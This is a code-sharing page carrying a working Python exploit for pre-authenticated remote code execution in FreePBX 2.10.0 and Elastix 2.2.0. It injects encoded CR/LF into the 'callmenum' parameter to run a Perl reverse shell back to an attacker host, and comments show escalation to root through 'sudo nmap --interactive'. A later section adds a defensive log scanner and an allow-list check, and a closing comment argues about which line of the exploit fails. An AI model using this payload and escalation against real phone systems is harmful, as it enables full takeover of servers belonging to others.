Created June 2, 2018 11:31
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution - Fixed to avoid SSL errors.
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
#############################################################
#import urllib
rhost="172.16.254.72"
lhost="172.16.254.223"
lport=4443
extension="1000"
import urllib2
import ssl
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib2.urlopen(url, context=ctx)
# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
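The request in the gist works because the `callmenum` value reaches an Asterisk call file with its encoded CR/LF intact, so extra `Application:` and `Data:` headers ride along with the number. The script below is an added defender-side example, not code from the gist or from FreePBX/Elastix: it scans constructed Apache-style access-log lines for that pattern on `/recordings/misc/callme_page.php` and shows the digits-only allow-list check a hardened handler would apply before using the value. The path and parameter name come from the gist; the regexes, function names, sample log lines and the digits-only rule are assumptions made for this example.

```python
#!/usr/bin/env python3
# Added defender-side example; not code from the gist or from FreePBX/Elastix.
# It parses constructed Apache-style access-log lines and flags requests that
# smuggle extra Asterisk call-file headers into callme_page.php's 'callmenum'
# parameter via encoded CR/LF, and shows the allow-list check that rejects them.
import re
from urllib.parse import urlsplit, parse_qs

# Path used by the gist's request (taken from the page).
TARGET_PATH = "/recordings/misc/callme_page.php"
# Strict allow-list for an extension: digits only (an assumption chosen for this
# example; relax it only if your dial plan legitimately needs other characters).
EXTENSION_RE = re.compile(r"^\d{1,10}$")
# Call-file headers that must never appear inside a user-supplied number.
INJECTED_HEADER_RE = re.compile(r"\r?\n[ \t]*(application|data|channel)[ \t]*:", re.I)
# Request target inside a combined-format log line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')


def is_safe_extension(value: str) -> bool:
    """Allow-list check a hardened handler would apply before using the value."""
    return bool(EXTENSION_RE.match(value))


def inspect_request(target: str) -> list:
    """Return the reasons a request target looks like callmenum abuse
    (an empty list means nothing suspicious was found)."""
    parts = urlsplit(target)
    if parts.path != TARGET_PATH:
        return []
    reasons = []
    # parse_qs percent-decodes values, so %0D%0A becomes a real CR/LF here.
    for value in parse_qs(parts.query, keep_blank_values=True).get("callmenum", []):
        if INJECTED_HEADER_RE.search(value):
            reasons.append("CRLF-injected call-file header in callmenum")
        if not is_safe_extension(value):
            # Also catches double-encoded CR/LF and '@context' suffixes.
            reasons.append("callmenum is not a plain numeric extension")
    return reasons


def scan_access_log(lines) -> list:
    """Scan log lines; return [{'line': n, 'target': ..., 'reasons': [...]}] for hits."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = inspect_request(m.group(1))
        if reasons:
            hits.append({"line": n, "target": m.group(1), "reasons": reasons})
    return hits


# Constructed sample log: addresses reuse the gist's lab values; line 1 is a
# normal call-me request, line 2 carries an encoded CR/LF with a harmless
# command, line 3 is unrelated traffic.
SAMPLE_LOG = [
    '172.16.254.223 - - [23/Mar/2012:10:00:01 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '172.16.254.223 - - [23/Mar/2012:10:00:02 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20id%0D%0A%0D%0A HTTP/1.1" 200 512 "-" "Python-urllib/2.7"',
    '172.16.254.223 - - [23/Mar/2012:10:00:03 +0000] "GET /admin/config.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {', '.join(hit['reasons'])}")
```

Running the script reports only the second sample line, with both reasons. The allow-list check is the part worth reusing in an application: rejecting anything but digits before the value is written into a call file closes the header-injection path regardless of how the CR/LF is encoded, while the log scan is a way to find past attempts in existing access logs.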
Thanks for the reply. But you're wrong.
urllib2.urlopen(url, context=ctx)
is correct. The extension="1000"
is the problem here. Check this https://github.com/A1vinSmith/FreePBX-2.10.0---Elastix-2.2.0---Remote-Code-Execution/blob/master/exploit.py